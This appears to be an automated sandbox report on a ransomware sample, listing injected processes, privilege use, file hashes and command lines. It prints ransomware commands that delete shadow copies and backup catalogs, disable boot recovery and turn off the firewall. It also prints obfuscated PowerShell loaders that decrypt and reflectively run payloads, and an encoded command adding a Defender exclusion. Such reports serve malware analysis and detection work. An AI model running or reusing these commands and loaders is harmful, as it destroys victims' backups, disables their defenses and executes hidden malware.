Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E709.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 3176 wrote to memory of 3824 N/A N/A C:\Users\Admin\AppData\Local\Temp\E709.exe
PID 3176 wrote to memory of 3824 N/A N/A C:\Users\Admin\AppData\Local\Temp\E709.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 4056 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2528 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2528 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3708 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3708 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3708 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3708 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 2528 wrote to memory of 1220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\E709.exe

C:\Users\Admin\AppData\Local\Temp\E709.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

C:\Users\Admin\AppData\Local\Temp\EC3B.exe

C:\Users\Admin\AppData\Local\Temp\EC3B.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

"C:\Users\Admin\AppData\Local\Temp\E9AA.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4580 -ip 4580

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 460

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Users\Admin\AppData\Local\FallbackBuffer\sdeonfynl\PublicKey.exe

C:\Users\Admin\AppData\Local\FallbackBuffer\sdeonfynl\PublicKey.exe

Network

Country Destination Domain Proto

Files


MD5 69852069b29113f9eda1a1d79b83cdf8
SHA1 9af9be634ebb6d92ec5d5b001efc8dcacf759e63
SHA256 7a965cadded1462a8e08f71635fa8c0fa1d093d5ff513eb37d88bc2a02f8e20d
SHA512 f9c37d68a4678ef4ab3537a3154c851de9d3858a04b761929574c4496fdc2191075a554152733ef3e26aa61e18edea58b00e4507aa69fe73132d51b73c767a88

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f50cwweb.wzt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

MD5 9a14111c41da1571ba38ad3d0892bfe4
SHA1 96a026301c11d58c0443120f994cc5c8501abbe2
SHA256 f053ae2aa3c5584ca7d30ff20be9a766996ec55ca55c2b2893b126044954a632
SHA512 5c7e6b47528703bb64fb28ad653205fc38ec7e5acf35d301bfeb751da82be905e3ce29f2e3f9e5652a2fe946fb7b3b2a39717e71086602dd8a6fed0282529a76

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\System32\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll

MD5 d765b98325d89c076feeab1282cd08ea
SHA1 1c0e044db845f4bf5486ccf23675b5394d568bb3
SHA256 ac2f0a68a2bcaaf2decb0aaf1b50d652ed8b631b08d06b910b407fef9069412e
SHA512 5c726e7ca5282d1f51178c814c76ca268b604ccb5aad744aadfdded4883f9e28afd0d9f9a30daca2fed017028c54e54f6e04f3aabb12a2d0b37a44267fadb37d

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 a2d206b3bb2136a488d9cb964b687e08
SHA1 12198dd603f952bdd10779deded4e674813cd05d
SHA256 c31fd76639afcf2f51003855ca0ce2c7e0e4b69b1a3b2d1e080d5354af8f89f8
SHA512 718ac462634d3957c240fe335214fdff7f6d4ba66331cd96f8db59a46dd7536393f0268689e98769958a7a7af99ce433575386cd9b642bb59422f0f4abce0622

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll

MD5 cf72d2bb801b140d14b5ef94a7193333
SHA1 a012220fe3a7aa1866ebee06eeaeff5488224d21
SHA256 95a8dc32bce0d7bf43235d7c6f593cbbcee2ea79d84b955424bc582968d737e4
SHA512 f8c5a8c4cfb8cc90710cc88f29885a174161e7123ee16ee4a3165ca0aa3074f3a7c6a93761fdf7a387a187f53fd3fed952f6e285a23485c56be7ef0631d3180d

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
